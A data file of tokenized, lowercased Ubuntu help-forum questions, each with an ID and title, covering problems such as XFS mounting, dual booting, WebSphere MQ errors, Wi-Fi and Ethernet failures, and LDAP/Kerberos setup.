486093	ca n't mount xfs filesystem after reboot	i have an amazon ec2 instance running ubuntu 12.04 . it has an attached ebs volume formatted as xfs . it 's worked fine for a long time . however , after a reboot today , the volume is no longer being mounted . if i try to mount it manually with : mount -t auto /dev/xvdf /usr/local/mnt/media i get mount : unknown filesystem type 'xfs' so , it seems i 'm now unable to mount this volume . strangely if i check /dev/xvdf , it is indeed an xfs filesytem . file -s /dev/xvdf /dev/xvdf : sgi xfs filesystem data ( blksz 4096 , inosz 256 , v2 dirs ) so apparently ubuntu `` forgot '' about xfs . any help or input would be really appreciated as i 'm stumped . edit output of lsmod | grep xfs returns nothing , and the output of grep -h xfs_fs /boot/config- $ ( uname -r ) returns grep : /boot/config-3.2.0-64-virtual : no such file or directory so now i 'm really confused , xfs has apparently disappeared from this server . edit i ca n't load the module manually either modprobe -v xfs fatal : could not load /lib/modules/3.2.0-64-virtual/modules.dep : no such file or directory
486095	too many partitions on drive , ca n't dual boot ubuntu alongside win8 on thinkpad	i have a thinkpad s431 with windows 8 . it has a 128gb ssd , and my partitions are winre_drv , windows8_os , lenovo_recovery , 7gb hibernation partition . i also have allocated 20gb for ubuntu . when i tried to install ubuntu , it told me that i have too many os 's on the machine , and the new partition i created is labeled `` unusable '' . what can i do ? edit : volume type is mbr . i have deleted an unnecessary windows 8 partition from gparted in the try ubuntu option . from there i have also formatted the drive to be ext4 on /dev/sda4 now the problem is that ubuntu will not install as `` root file system is not detected '' i used ext2 as the filesystem for ubuntu , and mount as '/ ' . this solved my problems !
486101	evolution mail accounts not listed in client	i 've found many instances of this problem but have not found any resolution . i did my diligence , i think , on install of 14.04 , by closely following the tutorial on things to do when upgrading ; for instance , i 've run a check on dependencies system wide . i 'm able to send and receive from three accounts but only one shows up in left panel of evolution . i 've stopped and restarted the client , and ubuntu ( 14.04 ) but still only see the first account i created . however , i do see three accounts in system settings/online accounts ; all three are google duplicates , it appears ; i doubt this has anything to do with evolution , however , though one of my email accts . is gmail . note i 've only created each of the three email accounts once . how does one get all created email accounts to appear in evolutions left panel ?
486102	unable to start ibm websphere mq on ubuntu	i installed websphere mq 7.5.0.1 on ubuntu 12.04 following the instructions here : http : //www-01.ibm.com/support/knowledgecenter/ssfksj_7.5.0/com.ibm.mq.ins.doc/q115250_.htm ? lang=en however , when i try to run setmqinst or setmqenv or dspmqver or anything i get : amq8101 : websphere mq error ( 40806007 ) has occurred . or : amq7047 : an unexpected error was encountered by a command . reason code is 0 . amq6090 : websphere mq was unable to display an error message 40806007 . the error dumped in /var/mqm/errors reads : + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | | | websphere mq first failure symptom report | | ========================================= | | | | date/time : - fri june 20 2014 12:58:26 mdt | | utc time : - 1403290706.866281 | | utc time offset : - 0 ( ) | | host name : - tomasz-optiplex-760 | | operating system : - linux 3.11.0-20-generic | | pids : - 5724h7230 | | lvls : - 7.5.0.1 | | product long name : - websphere mq for linux ( x86-64 platform ) | | vendor : - ibm | | installation path : - /opt/mqm | | installation name : - < unknown > ( 0 ) | | probe id : - xy335060 | | application name : - mqm | | component : - initprocessinitialisation | | build date : - mar 8 2013 | | build level : - p750-001-130308 | | build type : - ikap - ( production ) | | effective userid : - 1003 ( unknown ) | | real userid : - unknown | | program name : - crtmqenv | | addressing mode : - 64-bit | | lang : - | | process : - 27879 | | thread ( n ) : - 0 | | threadingmodel : - unknown | | userapp : - false | | major errorcode : - xecu_e_ini_file_error | | minor errorcode : - ok | | probe type : - msgamq6162 | | probe severity : - 2 | | probe description : - amq6109 : an internal websphere mq error has occurred . | | fdcsequencenumber : - 0 | | comment1 : - installation details could not be successfully | | obtained | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ no mqm function stack available process control block ( xihprocess ) 0x7fdaf0d0d880 58494850 281c0000 00000000 00000000 xihp ( ... ... ... .. 0x7fdaf0d0d890 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0d8a0 to 0x7fdaf0d0e9e0 suppressed , 277 lines same as above 0x7fdaf0d0e9f0 00000000 00000000 ffffffff 00000000 ... ... ... ... ... . 0x7fdaf0d0ea00 00000000 00000000 01000000 00000000 ... ... ... ... ... . 0x7fdaf0d0ea10 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0ea20 to 0x7fdaf0d0f270 suppressed , 134 lines same as above 0x7fdaf0d0f280 00000000 00000000 08000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f290 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f2a0 to 0x7fdaf0d0f370 suppressed , 14 lines same as above 0x7fdaf0d0f380 00000000 00000000 00000000 3c556e6b ... ... ... ... < unk 0x7fdaf0d0f390 6e6f776e 3e000000 00000000 002f6f70 nown > ... ... ../op 0x7fdaf0d0f3a0 742f6d71 6d000000 00000000 00000000 t/mqm ... ... ... .. 0x7fdaf0d0f3b0 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f3c0 to 0x7fdaf0d0f490 suppressed , 14 lines same as above 0x7fdaf0d0f4a0 00000000 00000000 ... ... .. zut common anchor ( zutcommon_anchor ) 0x7fdaf0d08840 5a554341 5a535441 00000000 524d5141 zucazsta ... .rmqa 0x7fdaf0d08850 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d08860 to 0x7fdaf0d08870 suppressed , 2 lines same as above 0x7fdaf0d08880 0000403f 0b000000 00000000 00000000 .. @ ? ... ... ... ... 0x7fdaf0d08890 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d088a0 64000000 64000000 00000000 00000000 d ... d ... ... ... .. 0x7fdaf0d088b0 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d088c0 to 0x7fdaf0d08910 suppressed , 6 lines same as above 0x7fdaf0d08920 00000000 00000000 05000000 00000000 ... ... ... ... ... . 0x7fdaf0d08930 06000000 00000000 00000000 00000000 ... ... ... ... ... . environment variables : shell=/bin/sh term=xterm xdg_session_cookie=63b067e8364687499f89ea8b00000007-1403241045.865705-841668053 oldpwd=/var/mqm user=mqm ls_colors=rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd=40 ; 33 ; 01 : or=40 ; 31 ; 01 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=01 ; 32 : .tar=01 ; 31 : .tgz=01 ; 31 : .arj=01 ; 31 : .taz=01 ; 31 : .lzh=01 ; 31 : .lzma=01 ; 31 : .tlz=01 ; 31 : .txz=01 ; 31 : .zip=01 ; 31 : .z=01 ; 31 : .z=01 ; 31 : .dz=01 ; 31 : .gz=01 ; 31 : .lz=01 ; 31 : .xz=01 ; 31 : .bz2=01 ; 31 : .bz=01 ; 31 : .tbz=01 ; 31 : .tbz2=01 ; 31 : .tz=01 ; 31 : .deb=01 ; 31 : .rpm=01 ; 31 : .jar=01 ; 31 : .war=01 ; 31 : .ear=01 ; 31 : .sar=01 ; 31 : .rar=01 ; 31 : .ace=01 ; 31 : .zoo=01 ; 31 : .cpio=01 ; 31 : .7z=01 ; 31 : .rz=01 ; 31 : .jpg=01 ; 35 : .jpeg=01 ; 35 : .gif=01 ; 35 : .bmp=01 ; 35 : .pbm=01 ; 35 : .pgm=01 ; 35 : .ppm=01 ; 35 : .tga=01 ; 35 : .xbm=01 ; 35 : .xpm=01 ; 35 : .tif=01 ; 35 : .tiff=01 ; 35 : .png=01 ; 35 : .svg=01 ; 35 : .svgz=01 ; 35 : .mng=01 ; 35 : .pcx=01 ; 35 : .mov=01 ; 35 : .mpg=01 ; 35 : .mpeg=01 ; 35 : .m2v=01 ; 35 : .mkv=01 ; 35 : .webm=01 ; 35 : .ogm=01 ; 35 : .mp4=01 ; 35 : .m4v=01 ; 35 : .mp4v=01 ; 35 : .vob=01 ; 35 : .qt=01 ; 35 : .nuv=01 ; 35 : .wmv=01 ; 35 : .asf=01 ; 35 : .rm=01 ; 35 : .rmvb=01 ; 35 : .flc=01 ; 35 : .avi=01 ; 35 : .fli=01 ; 35 : .flv=01 ; 35 : .gl=01 ; 35 : .dl=01 ; 35 : .xcf=01 ; 35 : .xwd=01 ; 35 : .yuv=01 ; 35 : .cgm=01 ; 35 : .emf=01 ; 35 : .axv=01 ; 35 : .anx=01 ; 35 : .ogv=01 ; 35 : .ogx=01 ; 35 : .aac=00 ; 36 : .au=00 ; 36 : .flac=00 ; 36 : .mid=00 ; 36 : .midi=00 ; 36 : .mka=00 ; 36 : .mp3=00 ; 36 : .mpc=00 ; 36 : .ogg=00 ; 36 : .ra=00 ; 36 : .wav=00 ; 36 : .axa=00 ; 36 : .oga=00 ; 36 : .spx=00 ; 36 : .xspf=00 ; 36 : mail=/var/mail/mqm path=/var/mqsi/scripts : /home/tomasz/apps/jdk1.7.0_51/bin : /usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games : /var/mqsi/vpn pwd=/var/mqm/errors java_home=/home/tomasz/apps/jdk1.7.0_51 lang=en_us.utf-8 mq_ld_library_path= shlvl=1 home=/var/mqsi logname=mqm lessopen=| /usr/bin/lesspipe % s display=:0 lessclose=/usr/bin/lesspipe % s % s xauthority=/home/tomasz/.xauthority colorterm=gnome-terminal _=/opt/mqm/bin/crtmqenv + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | | | websphere mq first failure symptom report | | ========================================= | | | | date/time : - fri june 20 2014 12:58:26 mdt | | utc time : - 1403290706.867839 | | utc time offset : - 0 ( ) | | host name : - tomasz-optiplex-760 | | operating system : - linux 3.11.0-20-generic | | pids : - 5724h7230 | | lvls : - 7.5.0.1 | | product long name : - websphere mq for linux ( x86-64 platform ) | | vendor : - ibm | | installation path : - /opt/mqm | | installation name : - < unknown > ( 0 ) | | probe id : - mq000009 | | application name : - mqm | | component : - unknown | | build date : - mar 8 2013 | | build level : - p750-001-130308 | | build type : - ikap - ( production ) | | effective userid : - 1003 ( unknown ) | | real userid : - unknown | | program name : - crtmqenv | | addressing mode : - 64-bit | | lang : - | | process : - 27879 | | thread ( n ) : - 0 | | threadingmodel : - unknown | | userapp : - false | | major errorcode : - xeci_s_not_init | | minor errorcode : - ok | | probe type : - incorrout | | probe severity : - 1 | | probe description : - amq6109 : an internal websphere mq error has occurred . | | fdcsequencenumber : - 1 | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ no mqm function stack available process control block ( xihprocess ) 0x7fdaf0d0d880 58494850 281c0000 00000000 00000000 xihp ( ... ... ... .. 0x7fdaf0d0d890 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0d8a0 to 0x7fdaf0d0e9e0 suppressed , 277 lines same as above 0x7fdaf0d0e9f0 00000000 00000000 ffffffff 00000000 ... ... ... ... ... . 0x7fdaf0d0ea00 00000000 00000000 02000000 00000000 ... ... ... ... ... . 0x7fdaf0d0ea10 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0ea20 to 0x7fdaf0d0f270 suppressed , 134 lines same as above 0x7fdaf0d0f280 00000000 00000000 08000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f290 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f2a0 to 0x7fdaf0d0f370 suppressed , 14 lines same as above 0x7fdaf0d0f380 00000000 00000000 00000000 3c556e6b ... ... ... ... < unk 0x7fdaf0d0f390 6e6f776e 3e000000 00000000 002f6f70 nown > ... ... ../op 0x7fdaf0d0f3a0 742f6d71 6d000000 00000000 00000000 t/mqm ... ... ... .. 0x7fdaf0d0f3b0 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d0f3c0 to 0x7fdaf0d0f490 suppressed , 14 lines same as above 0x7fdaf0d0f4a0 00000000 00000000 ... ... .. zut common anchor ( zutcommon_anchor ) 0x7fdaf0d08840 5a554341 5a535441 00000000 524d5141 zucazsta ... .rmqa 0x7fdaf0d08850 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d08860 to 0x7fdaf0d08870 suppressed , 2 lines same as above 0x7fdaf0d08880 0000403f 0b000000 00000000 00000000 .. @ ? ... ... ... ... 0x7fdaf0d08890 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d088a0 64000000 64000000 00000000 00000000 d ... d ... ... ... .. 0x7fdaf0d088b0 00000000 00000000 00000000 00000000 ... ... ... ... ... . 0x7fdaf0d088c0 to 0x7fdaf0d08910 suppressed , 6 lines same as above 0x7fdaf0d08920 00000000 00000000 05000000 00000000 ... ... ... ... ... . 0x7fdaf0d08930 06000000 00000000 00000000 00000000 ... ... ... ... ... .
486107	how to disable the [ hp ] acpi button for the wireless card ?	i have ubuntu 14.04 running on a compaq cq60 laptop . ever since i installed ubuntu ( back on 12.04 ) , the `` toggle wireless '' button next to the power button hard locks the wifi adapter , causing me to have to run the sudo rfkill unlock wifi command in terminal . issue is , other people use the computer and press the button by accident when i 'm not around to fix it , causing the laptop to be ( basically ) useless . i 'm looking for a way to change the button 's action or disable it entirely . i 've seen a lot of questions on here having to do with the power button , but not the wireless toggle button . about all i know about it is it 's a acpi button and it worked properly when windows ran on the computer . ( ew ) does anyone know how to change its ' acpi action and/or where its ' acpi action script is located on the filesystem ? thanks for reading !
486109	downgrade matlab java from 7 to 6 in ubuntu error	i 'm trying to downgrade matlab java from 7 to 6 because of some problem in ubuntu like problem in creating gui ( using guide ) in matlab.the application and figures that i created with matlab r2014a in windows 8.1 have a lot of problems here.the size , dark gray colour of windows , design of buttons and graphs changed in ubuntu and more.. . i read in matlab community site and ask ubuntu that i must downgrade java to 1.6 for this problem . so this is my procedure : sudo apt-get install oracle-java6-installer ( getting java oracle in terminal ) export matlab_java=/usr/lib/jvm/java_6_oracle/jre ( set matlab java in terminal- address is the path of java that downloaded ) after running matlab with ./matlab i have this error : > fatal error on startup : can not locate or initialize class > com/mathworks /jmi/opaquejavainterface . > java.lang.unsupportedclassversionerror : > com/mathworks/jmi/opaquejavainterface : unsupported major.minor > version 51.0 at java.lang.classloader.defineclass1 ( native method ) at > java.lang.classloader.defineclasscond ( classloader.java:631 ) at > java.lang.classloader.defineclass ( classloader.java:615 ) at > java.security.secureclassloader.defineclass ( secureclassloader.java:141 ) > at java.net.urlclassloader.defineclass ( urlclassloader.java:283 ) at > java.net.urlclassloader.access $ 000 ( urlclassloader.java:58 ) at > java.net.urlclassloader $ 1.run ( urlclassloader.java:197 ) at > java.security.accesscontroller.doprivileged ( native method ) at > java.net.urlclassloader.findclass ( urlclassloader.java:190 ) at > java.lang.classloader.loadclass ( classloader.java:306 ) at > sun.misc.launcher $ appclassloader.loadclass ( launcher.java:301 ) at > java.lang.classloader.loadclass ( classloader.java:247 ) i 'm downgrading java 1.7 of matlab r2014a to 1.6 . when i use downloaded java 1.7 with terminal and connect it to matlab there isnât any problem so i think the problem is only in downgrading it to 1.6 . thanks . ps . this is some other discussion that may help : http : //stackoverflow.com/questions/16114951/when-i-run-guide-in-matlab-it-opens-a-blank-all-gray-window-whats-going-on
486113	`` gpg error : clearsigned file is n't valid '' when installing mongodb	i am trying to install mongodb using the instructions provided on this page . http : //thecodebarbarian.wordpress.com/2013/07/22/introduction-to-the-mean-stack-part-one-setting-up-your-tools/ i get to the step where you do `` sudo apt-get update '' and most of this runs just fine until i get the error as follows . e : gpg error : http : //downlaods-distro.mongodb.org dist inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) this means i ca n't continue with the installation . is there any way i can fix this ? i am completely lost . thanks in advance for your help .
486115	were is the debian package for blender 2.70a ?	in the official repository of ubuntu and debian is only the 2.6 version of blender . i searched with google to find a debian package to download . but i found nothing .
486117	network unreachanble	i have a wifi router and all other devices are working fine ( have i-net ) on my ubuntu box i can connect to wifi network . i can not ping anything : $ ip a 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down group default qlen 1000 link/ether 78 : e3 : b5:4e : b2:77 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up group default qlen 1000 link/ether cc:52 : af:13 : ca:43 brd ff : ff : ff : ff : ff : ff inet 192.168.0.101/24 brd 192.168.0.255 scope global wlan0 valid_lft forever preferred_lft forever inet6 fe80 : :ce52 : afff : fe13 : ca43/64 scope link valid_lft forever preferred_lft forever $ ip a s 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down group default qlen 1000 link/ether 78 : e3 : b5:4e : b2:77 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up group default qlen 1000 link/ether cc:52 : af:13 : ca:43 brd ff : ff : ff : ff : ff : ff inet 192.168.0.101/24 brd 192.168.0.255 scope global wlan0 valid_lft forever preferred_lft forever inet6 fe80 : :ce52 : afff : fe13 : ca43/64 scope link valid_lft forever preferred_lft forever $ ip r s 192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.101 $ ping google.com ping : unknown host google.com ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . from 192.168.0.101 icmp_seq=1 destination host unreachable from 192.168.0.101 icmp_seq=2 destination host unreachable $ ping 192.168.0.2 ping 192.168.0.2 ( 192.168.0.2 ) 56 ( 84 ) bytes of data . from 192.168.0.101 icmp_seq=1 destination host unreachable # /etc/resolvconf/resolv.conf.d/head # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 8.8.8.8 nameserver 8.8.4.4 nameserver 192.168.0.2 nameserver 0.0.0.0 $ dig @ 192.168.0.1 www.google.de ; < < > > dig 9.9.5-3-ubuntu < < > > @ 192.168.0.1 www.google.de ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached please , i need your help ! edit wan ip address : 192.168.0.101 subnet mask : 255.255.255.0 default gateway : 192.168.0.2 primary dns server : 192.168.0.2 secondary dns server : 0.0.0.0 lan ip address : 192.168.0.1 subnet mask : 255.255.255.0 dhcp-server : enabled edit 2 ipconf from windows pc that have no problems with network connection-specific dns suffix . : link-local ipv6 address . . . . . : fe80 : :a93e:9f0f:530f : a18c % 11 ipv4 address . . . . . . . . . . . : 192.168.0.102 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.0.1
486123	since the touch command can set an arbtrary time , is there a way to get the real modified time of a file ?	my title pretty much says it all : since the touch command can set an arbtrary time , is there a way to get the real modified time of a file ?
486126	virtualbox guest additions are not used	today , it seemed in my ubuntu 14.04 vm ( kubuntu 14.04 host ) , there was an update for the guest additions to 4.3.12 , and i was requested to install them from the devices menu . i did this , but even though the guest additions installer ran completely ok ( though it looks like it did a `` non-kernel '' installation ) , guest additions are not working properly and i do n't get 3d graphics acceleration . is there any way to solve this problem with the latest version of guest additions ?
486130	my windows partition got deleted when upgrading to 14.04 from 12.04	i had ubuntu 12.04 installed on my system . i tried to upgrade my system to ubuntu 14.04 . while partitioning , it gave me an option to erase ubuntu 12.04 and all data , i selected that option . it clearly looks like this option is talking about erasing all ubuntu 12.04 data existing on the ubuntu ext filesystem . but , it completely erased all my windows partition as well . it became a nightmare for me as i have lost all my data . is their any option available at all to recover any of my data . and i would also ask ubuntu developers to please add specific warning as this option will erase all the windows partition as well .
486131	having trouble setting up ldap and kerberos	i 'm following the 14.4 server guide for kerberos and ldap . when i get to step 3.5 of configuring ldap , it says my password is wrong : ldap_bind : invalid credentials ( 49 ) i guess the password on cn=config is different from the one i set when i dkpg-reconfigure slapd and set up my domain components ? i worked around this by changing the command to : sudo ldapadd -q -y external -h ldapi : /// -f cn\=kerberos.ldif when i do step 7 , i get this error : modifying entry `` olcdatabase= { 1 } hdb , cn=config '' ldap_modify : other ( e.g. , implementation specific ) error ( 80 ) additional info : < olcaccess > handler exited with 1 if i move on to primary kdc configuration , when i get to step 3 , after typing in my password and setting the `` database master password '' , it says this : kdb5_ldap_util : kerberos container create failed : object class violation while creating realm 'example.com' i 'm not sure what this means . i was sure to add the kerberos schema in the earlier steps . in fact , if i try to do it again now i get this error : adding new entry `` cn=kerberos , cn=schema , cn=config '' ldap_add : other ( e.g. , implementation specific ) error ( 80 ) additional info : olcattributetypes : duplicate attributetype : `` 2.16.840.1.113719.1.301.4.1.1 ''
486133	set up router with my laptop , now the laptop ca n't see it	the title pretty much says it all . i used my dell inspiron 1110 laptop to set up my d-link dir-635 router ( i.e . give it a name and password ) , and when i rebooted the router to keep those settings my laptop , running ubuntu 12.04lts no longer saw the network . all my other devices see it just fine and use it just fine . the wireless is just not working with my laptop now , even though it works when i plug in the wire . what 's going on ? as requested , here 's the pastebin from the script in the accepted answer . none of the wireless points listed is the wifi i set up and which works just fine on my phone . http : //pastebin.ubuntu.com/7681069/
486136	epson workforce 435 printer driver not installing on 14.04 lts	has anyone else had any problems installing the printer driver on 14.04lts ? it worked fine on 12.04lts but it wo n't download the driver it just stays an 0 % help plz ! ! !
486138	why i do n't see lts on the iso filename downloaded ?	i downloaded this ubuntu 14.04 lts on a mac plus the windows version but i do n't see lts on the iso file name . any hint ?
486145	connecting a pyboard via usb gives `` could not grab port ( tty/ttyacm0 ) ''	when i plug a micropython ( arduino-like microprocessor board ) in via usb it works just fine as a usb file-system , however i can not use it as a tty . i 'm using ubuntu 14.4 64bit . when i plug in the device i get this in syslog : jun 20 22:01:24 halob modemmanager [ 801 ] : < info > creating modem with plugin 'generic ' and '1 ' ports jun 20 22:01:24 halob modemmanager [ 801 ] : < warn > could not grab port ( tty/ttyacm0 ) : ' can not add port 'tty/ttyacm0 ' , unhandled serial type' jun 20 22:01:24 halob modemmanager [ 801 ] : < warn > could n't create modem for device at '/sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-2 ' : failed to find primary at port the lusb -v output looks like this : bus 003 device 050 : id f055:9800 device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0xf055 idproduct 0x9800 bcddevice 2.00 imanufacturer 1 micro python iproduct 2 pyboard virtual comm port in fs mode iserial 3 000000000011 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 98 bnuminterfaces 3 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface association : blength 8 bdescriptortype 11 bfirstinterface 1 binterfacecount 2 bfunctionclass 0 ( defined at interface level ) bfunctionsubclass 0 bfunctionprotocol 0 ifunction 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 1 binterfaceclass 2 communications binterfacesubclass 2 abstract ( modem ) binterfaceprotocol 1 at-commands ( v.25ter ) iinterface 0 cdc header : bcdcdc 1.10 cdc call management : bmcapabilities 0x00 bdatainterface 2 cdc acm : bmcapabilities 0x02 line coding and serial state cdc union : bmasterinterface 1 bslaveinterface 2 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 32 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 2 binterfaceclass 10 cdc data binterfacesubclass 0 unused binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 device status : 0x0000 ( bus powered )
486146	network card issues on asus n550jk with ubuntu 14.04 lts	the network card ( realtek gigabit ethernet ) does n't work , does n't send or receive packets . there is an error message saying something about a transmit queue timeout . i 'm including some output that may be relevant . i 've tried pcie_aspm=off , rmmod+modprobe , but no clue . can somebody please help . thank you martin # uname -a linux astro 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux # cat /etc/lsb-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04 lts '' # smbios-sys-info libsmbios version : 2.2.28 product name : n550jk vendor : asustek computer inc. bios version : n550jk.204 # lspci -k -s 05:00.0 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) subsystem : asustek computer inc. device 200f kernel driver in use : r8169 output from dmesg [ 89.796072 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 89.796084 ] warning : cpu : 7 pid : 0 at /build/buildd/linux-3.13.0/net/sched/sch_generic.c:264 dev_watchdog+0x276/0x280 ( ) [ 89.796086 ] netdev watchdog : eth0 ( r8169 ) : transmit queue 0 timed out [ 89.796087 ] modules linked in : bnep rfcomm nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops rts5139 ( c ) videobuf2_core hid_multitouch mcs7830 videodev usbnet asus_nb_wmi asus_wmi sparse_keymap snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec arc4 snd_hwdep snd_pcm x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel snd_page_alloc ath9k snd_seq_midi ath9k_common snd_seq_midi_event kvm ath9k_hw snd_rawmidi ath snd_seq mac80211 snd_seq_device joydev snd_timer ath3k serio_raw btusb snd bluetooth cfg80211 lpc_ich mei_me mei soundcore parport_pc ppdev lp parport mac_hid dm_crypt usbhid hid crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul i915 glue_helper ablk_helper cryptd mxm_wmi i2c_algo_bit ttm psmouse ahci r8169 drm_kms_helper libahci drm mii wmi video [ 89.796136 ] cpu : 7 pid : 0 comm : swapper/7 tainted : g c 3.13.0-29-generic # 53-ubuntu [ 89.796137 ] hardware name : asustek computer inc. n550jk/n550jk , bios n550jk.204 01/23/2014 [ 89.796138 ] 0000000000000009 ffff88042efc3d98 ffffffff8171a214 ffff88042efc3de0 [ 89.796141 ] ffff88042efc3dd0 ffffffff810676bd 0000000000000000 ffff880412340000 [ 89.796144 ] ffff8804129b6480 0000000000000001 0000000000000007 ffff88042efc3e30 [ 89.796146 ] call trace : [ 89.796148 ] [ ] dump_stack+0x45/0x56 [ 89.796156 ] [ ] warn_slowpath_common+0x7d/0xa0 [ 89.796158 ] [ ] warn_slowpath_fmt+0x4c/0x50 [ 89.796162 ] [ ] dev_watchdog+0x276/0x280 [ 89.796165 ] [ ] ? dev_graft_qdisc+0x80/0x80 [ 89.796168 ] [ ] call_timer_fn+0x36/0x100 [ 89.796171 ] [ ] ? dev_graft_qdisc+0x80/0x80 [ 89.796173 ] [ ] run_timer_softirq+0x1ef/0x2f0 [ 89.796176 ] [ ] __do_softirq+0xec/0x2c0 [ 89.796179 ] [ ] irq_exit+0x105/0x110 [ 89.796182 ] [ ] smp_apic_timer_interrupt+0x45/0x60 [ 89.796186 ] [ ] apic_timer_interrupt+0x6d/0x80 [ 89.796187 ] [ ] ? cpuidle_enter_state+0x52/0xc0 [ 89.796191 ] [ ] cpuidle_idle_call+0xb9/0x1f0 [ 89.796196 ] [ ] arch_cpu_idle+0xe/0x30 [ 89.796199 ] [ ] cpu_startup_entry+0xc5/0x290 [ 89.796202 ] [ ] start_secondary+0x218/0x2c0 [ 89.796204 ] -- - [ end trace 215922eb1d7267b2 ] -- -
486147	turn ubutntu 14.04 into a server	yes i have built my own quad core server i would like to turn it into a server so that i can access my movies that i ripped from my own dvds i bought to my desktop it has 10tb inside it i would like a list of programs and ways to install and ways to set-up the programs also but i donât want to want to do a fresh install cause i did a lot of my dvds already
